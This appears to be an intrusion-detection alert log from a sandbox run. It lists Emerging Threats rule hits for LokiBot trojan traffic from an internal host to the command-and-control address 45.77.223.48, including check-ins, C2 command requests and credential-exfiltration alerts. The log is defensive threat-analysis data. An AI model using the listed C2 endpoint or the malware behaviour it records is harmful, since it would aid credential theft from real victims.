04/26/24-04:42:44.797094	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.4	45.77.223.48
04/26/24-04:42:21.613500	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.4	45.77.223.48
04/26/24-04:42:49.953966	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49772	80	192.168.2.4	45.77.223.48
04/26/24-04:42:26.179565	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49757	80	192.168.2.4	45.77.223.48
04/26/24-04:42:49.953966	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49772	80	192.168.2.4	45.77.223.48
04/26/24-04:42:26.179565	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49757	80	192.168.2.4	45.77.223.48
04/26/24-04:42:35.607137	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.4	45.77.223.48
04/26/24-04:43:26.329932	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.4	45.77.223.48
04/26/24-04:43:00.052049	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.4	45.77.223.48
04/26/24-04:43:24.904349	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.4	45.77.223.48
04/26/24-04:43:29.172203	TCP	2025381	ET TROJAN LokiBot Checkin	49800	80	192.168.2.4	45.77.223.48
04/26/24-04:42:47.670237	TCP	2025381	ET TROJAN LokiBot Checkin	49771	80	192.168.2.4	45.77.223.48
04/26/24-04:42:18.687770	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.4	45.77.223.48
04/26/24-04:43:07.513137	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49785	80	192.168.2.4	45.77.223.48
04/26/24-04:42:14.041821	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.4	45.77.223.48
04/26/24-04:42:18.687770	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.4	45.77.223.48
04/26/24-04:42:24.705958	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.4	45.77.223.48
04/26/24-04:42:14.041821	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.4	45.77.223.48
04/26/24-04:42:34.173942	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.4	45.77.223.48
04/26/24-04:43:00.052049	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49780	80	192.168.2.4	45.77.223.48
04/26/24-04:42:02.935480	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.4	45.77.223.48
04/26/24-04:42:58.597395	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49779	80	192.168.2.4	45.77.223.48
04/26/24-04:42:08.768305	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.4	45.77.223.48
04/26/24-04:42:58.597395	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49779	80	192.168.2.4	45.77.223.48
04/26/24-04:43:07.513137	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49785	80	192.168.2.4	45.77.223.48
04/26/24-04:42:41.660723	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.4	45.77.223.48
04/26/24-04:43:19.056808	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.4	45.77.223.48
04/26/24-04:43:42.908989	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.4	45.77.223.48
04/26/24-04:43:21.940707	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.4	45.77.223.48
04/26/24-04:42:52.847994	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.4	45.77.223.48
04/26/24-04:43:04.288590	TCP	2025381	ET TROJAN LokiBot Checkin	49783	80	192.168.2.4	45.77.223.48
04/26/24-04:42:07.242464	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.4	45.77.223.48
04/26/24-04:42:07.242464	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.4	45.77.223.48
04/26/24-04:43:34.068335	TCP	2025381	ET TROJAN LokiBot Checkin	49802	80	192.168.2.4	45.77.223.48
04/26/24-04:43:17.632927	TCP	2025381	ET TROJAN LokiBot Checkin	49792	80	192.168.2.4	45.77.223.48
04/26/24-04:43:44.358398	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49808	80	192.168.2.4	45.77.223.48
04/26/24-04:42:38.508836	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.4	45.77.223.48
04/26/24-04:43:35.596260	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.4	45.77.223.48
04/26/24-04:43:13.266385	TCP	2025381	ET TROJAN LokiBot Checkin	49789	80	192.168.2.4	45.77.223.48
04/26/24-04:42:38.508836	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.4	45.77.223.48
04/26/24-04:42:23.188583	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.4	45.77.223.48
04/26/24-04:43:11.850756	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.4	45.77.223.48
04/26/24-04:42:20.116742	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.4	45.77.223.48
04/26/24-04:43:42.908989	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49807	80	192.168.2.4	45.77.223.48
04/26/24-04:43:20.496255	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.4	45.77.223.48
04/26/24-04:42:17.251353	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.4	45.77.223.48
04/26/24-04:43:30.595490	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49801	80	192.168.2.4	45.77.223.48
04/26/24-04:43:45.956580	TCP	2025381	ET TROJAN LokiBot Checkin	49809	80	192.168.2.4	45.77.223.48
04/26/24-04:42:02.935480	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.4	45.77.223.48
04/26/24-04:43:30.595490	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.4	45.77.223.48
04/26/24-04:43:11.850756	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.4	45.77.223.48
04/26/24-04:42:17.251353	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.4	45.77.223.48
04/26/24-04:42:51.405219	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.4	45.77.223.48
04/26/24-04:43:14.708232	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.4	45.77.223.48
04/26/24-04:43:01.472637	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.4	45.77.223.48
04/26/24-04:43:05.708325	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.4	45.77.223.48
04/26/24-04:42:46.212974	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.4	45.77.223.48
04/26/24-04:43:05.708325	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.4	45.77.223.48
04/26/24-04:42:57.146160	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.4	45.77.223.48
04/26/24-04:42:57.146160	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.4	45.77.223.48
04/26/24-04:42:35.607137	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.4	45.77.223.48
04/26/24-04:42:39.893817	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.4	45.77.223.48
04/26/24-04:42:44.797094	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.4	45.77.223.48
04/26/24-04:42:05.836233	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.4	45.77.223.48
04/26/24-04:42:10.160803	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.4	45.77.223.48
04/26/24-04:42:44.797094	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.4	45.77.223.48
04/26/24-04:42:54.249806	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.4	45.77.223.48
04/26/24-04:42:26.179565	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.4	45.77.223.48
04/26/24-04:42:54.249806	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.4	45.77.223.48
04/26/24-04:43:01.472637	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.4	45.77.223.48
04/26/24-04:42:49.953966	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.4	45.77.223.48
04/26/24-04:43:40.002816	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.4	45.77.223.48
04/26/24-04:42:04.426692	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.4	45.77.223.48
04/26/24-04:42:15.814851	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.4	45.77.223.48
04/26/24-04:43:14.708232	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.4	45.77.223.48
04/26/24-04:43:44.358398	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49808	80	192.168.2.4	45.77.223.48
04/26/24-04:43:24.904349	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49797	80	192.168.2.4	45.77.223.48
04/26/24-04:43:48.980951	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49811	80	192.168.2.4	45.77.223.48
04/26/24-04:43:24.904349	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.4	45.77.223.48
04/26/24-04:42:24.705958	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.4	45.77.223.48
04/26/24-04:42:27.665907	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.4	45.77.223.48
04/26/24-04:43:47.482327	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49810	80	192.168.2.4	45.77.223.48
04/26/24-04:42:18.687770	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.4	45.77.223.48
04/26/24-04:43:50.432496	TCP	2025381	ET TROJAN LokiBot Checkin	49812	80	192.168.2.4	45.77.223.48
04/26/24-04:43:16.174844	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.4	45.77.223.48
04/26/24-04:42:37.043735	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.4	45.77.223.48
04/26/24-04:43:27.753457	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.4	45.77.223.48
04/26/24-04:42:34.173942	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.4	45.77.223.48
04/26/24-04:42:24.705958	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.4	45.77.223.48
04/26/24-04:42:58.597395	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.4	45.77.223.48
04/26/24-04:43:41.435996	TCP	2025381	ET TROJAN LokiBot Checkin	49806	80	192.168.2.4	45.77.223.48
04/26/24-04:43:47.482327	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49810	80	192.168.2.4	45.77.223.48
04/26/24-04:43:38.519329	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49804	80	192.168.2.4	45.77.223.48
04/26/24-04:42:14.041821	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.4	45.77.223.48
04/26/24-04:42:34.173942	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.4	45.77.223.48
04/26/24-04:43:07.513137	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.4	45.77.223.48
04/26/24-04:42:27.665907	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.4	45.77.223.48
04/26/24-04:42:32.693379	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.4	45.77.223.48
04/26/24-04:42:14.041821	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.4	45.77.223.48
04/26/24-04:42:29.146660	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.4	45.77.223.48
04/26/24-04:42:27.665907	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.4	45.77.223.48
04/26/24-04:42:32.693379	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.4	45.77.223.48
04/26/24-04:43:42.908989	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.4	45.77.223.48
04/26/24-04:42:23.188583	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49755	80	192.168.2.4	45.77.223.48
04/26/24-04:42:34.173942	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.4	45.77.223.48
04/26/24-04:43:14.708232	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.4	45.77.223.48
04/26/24-04:42:12.565966	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.4	45.77.223.48
04/26/24-04:42:12.565966	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.4	45.77.223.48
04/26/24-04:42:07.242464	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.4	45.77.223.48
04/26/24-04:42:55.707371	TCP	2025381	ET TROJAN LokiBot Checkin	49777	80	192.168.2.4	45.77.223.48
04/26/24-04:43:26.329932	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.4	45.77.223.48
04/26/24-04:42:47.670237	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.4	45.77.223.48
04/26/24-04:43:21.940707	TCP	2025381	ET TROJAN LokiBot Checkin	49795	80	192.168.2.4	45.77.223.48
04/26/24-04:43:34.068335	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.4	45.77.223.48
04/26/24-04:42:47.670237	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.4	45.77.223.48
04/26/24-04:42:49.953966	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.4	45.77.223.48
04/26/24-04:42:38.508836	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.4	45.77.223.48
04/26/24-04:43:00.052049	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.4	45.77.223.48
04/26/24-04:43:04.288590	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49783	80	192.168.2.4	45.77.223.48
04/26/24-04:43:52.043341	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49813	80	192.168.2.4	45.77.223.48
04/26/24-04:42:20.116742	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.4	45.77.223.48
04/26/24-04:42:17.251353	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.4	45.77.223.48
04/26/24-04:43:11.850756	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.4	45.77.223.48
04/26/24-04:43:52.043341	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49813	80	192.168.2.4	45.77.223.48
04/26/24-04:43:20.496255	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.4	45.77.223.48
04/26/24-04:42:41.660723	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.4	45.77.223.48
04/26/24-04:42:20.116742	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.4	45.77.223.48
04/26/24-04:43:20.496255	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.4	45.77.223.48
04/26/24-04:42:02.935480	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49735	80	192.168.2.4	45.77.223.48
04/26/24-04:42:58.597395	TCP	2025381	ET TROJAN LokiBot Checkin	49779	80	192.168.2.4	45.77.223.48
04/26/24-04:43:23.393350	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.4	45.77.223.48
04/26/24-04:43:07.513137	TCP	2025381	ET TROJAN LokiBot Checkin	49785	80	192.168.2.4	45.77.223.48
04/26/24-04:42:02.935480	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49735	80	192.168.2.4	45.77.223.48
04/26/24-04:43:50.432496	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49812	80	192.168.2.4	45.77.223.48
04/26/24-04:42:57.146160	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49778	80	192.168.2.4	45.77.223.48
04/26/24-04:43:23.393350	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49796	80	192.168.2.4	45.77.223.48
04/26/24-04:42:35.607137	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.4	45.77.223.48
04/26/24-04:42:39.893817	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.4	45.77.223.48
04/26/24-04:43:35.596260	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49803	80	192.168.2.4	45.77.223.48
04/26/24-04:43:35.596260	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49803	80	192.168.2.4	45.77.223.48
04/26/24-04:42:30.890483	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49760	80	192.168.2.4	45.77.223.48
04/26/24-04:42:54.249806	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.4	45.77.223.48
04/26/24-04:43:29.172203	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49800	80	192.168.2.4	45.77.223.48
04/26/24-04:42:21.613500	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.4	45.77.223.48
04/26/24-04:43:40.002816	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49805	80	192.168.2.4	45.77.223.48
04/26/24-04:42:35.607137	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.4	45.77.223.48
04/26/24-04:43:44.358398	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49808	80	192.168.2.4	45.77.223.48
04/26/24-04:42:39.893817	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.4	45.77.223.48
04/26/24-04:43:01.472637	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.4	45.77.223.48
04/26/24-04:43:29.172203	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49800	80	192.168.2.4	45.77.223.48
04/26/24-04:42:15.814851	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.4	45.77.223.48
04/26/24-04:42:30.890483	TCP	2025381	ET TROJAN LokiBot Checkin	49760	80	192.168.2.4	45.77.223.48
04/26/24-04:43:48.980951	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49811	80	192.168.2.4	45.77.223.48
04/26/24-04:42:26.179565	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.4	45.77.223.48
04/26/24-04:42:52.847994	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.4	45.77.223.48
04/26/24-04:43:16.174844	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.4	45.77.223.48
04/26/24-04:43:08.959356	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.4	45.77.223.48
04/26/24-04:43:40.002816	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49805	80	192.168.2.4	45.77.223.48
04/26/24-04:42:43.312556	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49768	80	192.168.2.4	45.77.223.48
04/26/24-04:43:48.980951	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49811	80	192.168.2.4	45.77.223.48
04/26/24-04:42:43.312556	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49768	80	192.168.2.4	45.77.223.48
04/26/24-04:42:52.847994	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.4	45.77.223.48
04/26/24-04:43:10.461205	TCP	2025381	ET TROJAN LokiBot Checkin	49787	80	192.168.2.4	45.77.223.48
04/26/24-04:43:45.956580	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49809	80	192.168.2.4	45.77.223.48
04/26/24-04:42:51.405219	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49773	80	192.168.2.4	45.77.223.48
04/26/24-04:43:38.519329	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.4	45.77.223.48
04/26/24-04:43:16.174844	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.4	45.77.223.48
04/26/24-04:43:02.891159	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.4	45.77.223.48
04/26/24-04:43:47.482327	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49810	80	192.168.2.4	45.77.223.48
04/26/24-04:42:23.188583	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.4	45.77.223.48
04/26/24-04:42:37.043735	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.4	45.77.223.48
04/26/24-04:42:18.687770	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.4	45.77.223.48
04/26/24-04:42:27.665907	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.4	45.77.223.48
04/26/24-04:42:51.405219	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.4	45.77.223.48
04/26/24-04:42:24.705958	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.4	45.77.223.48
04/26/24-04:42:32.693379	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.4	45.77.223.48
04/26/24-04:42:51.405219	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49773	80	192.168.2.4	45.77.223.48
04/26/24-04:42:23.188583	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.4	45.77.223.48
04/26/24-04:42:37.043735	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.4	45.77.223.48
04/26/24-04:42:17.251353	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.4	45.77.223.48
04/26/24-04:42:46.212974	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49770	80	192.168.2.4	45.77.223.48
04/26/24-04:43:44.358398	TCP	2025381	ET TROJAN LokiBot Checkin	49808	80	192.168.2.4	45.77.223.48
04/26/24-04:43:26.329932	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.4	45.77.223.48
04/26/24-04:42:38.508836	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.4	45.77.223.48
04/26/24-04:43:13.266385	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.4	45.77.223.48
04/26/24-04:42:12.565966	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.4	45.77.223.48
04/26/24-04:42:05.836233	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.4	45.77.223.48
04/26/24-04:43:48.980951	TCP	2025381	ET TROJAN LokiBot Checkin	49811	80	192.168.2.4	45.77.223.48
04/26/24-04:43:26.329932	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.4	45.77.223.48
04/26/24-04:43:13.266385	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.4	45.77.223.48
04/26/24-04:42:10.160803	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.4	45.77.223.48
04/26/24-04:42:55.707371	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.4	45.77.223.48
04/26/24-04:42:39.893817	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.4	45.77.223.48
04/26/24-04:42:21.613500	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49754	80	192.168.2.4	45.77.223.48
04/26/24-04:42:47.670237	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.4	45.77.223.48
04/26/24-04:43:34.068335	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49802	80	192.168.2.4	45.77.223.48
04/26/24-04:42:04.426692	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49736	80	192.168.2.4	45.77.223.48
04/26/24-04:42:21.613500	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49754	80	192.168.2.4	45.77.223.48
04/26/24-04:43:04.288590	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49783	80	192.168.2.4	45.77.223.48
04/26/24-04:43:04.288590	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.4	45.77.223.48
04/26/24-04:43:34.068335	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49802	80	192.168.2.4	45.77.223.48
04/26/24-04:42:04.426692	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49736	80	192.168.2.4	45.77.223.48
04/26/24-04:42:29.146660	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.4	45.77.223.48
04/26/24-04:43:41.435996	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.4	45.77.223.48
04/26/24-04:43:05.708325	TCP	2025381	ET TROJAN LokiBot Checkin	49784	80	192.168.2.4	45.77.223.48
04/26/24-04:42:08.768305	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.4	45.77.223.48
04/26/24-04:43:02.891159	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.4	45.77.223.48
04/26/24-04:43:02.891159	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.4	45.77.223.48
04/26/24-04:43:52.043341	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49813	80	192.168.2.4	45.77.223.48
04/26/24-04:42:08.768305	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.4	45.77.223.48
04/26/24-04:43:47.482327	TCP	2025381	ET TROJAN LokiBot Checkin	49810	80	192.168.2.4	45.77.223.48
04/26/24-04:43:19.056808	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.4	45.77.223.48
04/26/24-04:43:27.753457	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49799	80	192.168.2.4	45.77.223.48
04/26/24-04:43:30.595490	TCP	2025381	ET TROJAN LokiBot Checkin	49801	80	192.168.2.4	45.77.223.48
04/26/24-04:43:20.496255	TCP	2025381	ET TROJAN LokiBot Checkin	49794	80	192.168.2.4	45.77.223.48
04/26/24-04:43:27.753457	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49799	80	192.168.2.4	45.77.223.48
04/26/24-04:43:50.432496	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49812	80	192.168.2.4	45.77.223.48
